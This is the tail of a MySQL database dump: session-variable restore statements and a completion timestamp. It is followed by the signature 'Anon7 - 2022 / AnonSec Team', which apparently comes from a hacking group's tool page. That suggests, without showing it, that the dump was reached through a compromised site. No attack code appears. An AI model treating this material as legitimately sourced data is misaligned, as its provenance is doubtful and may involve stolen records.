/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2026-06-19 21:24:55

Anon7 - 2022
AnonSec Team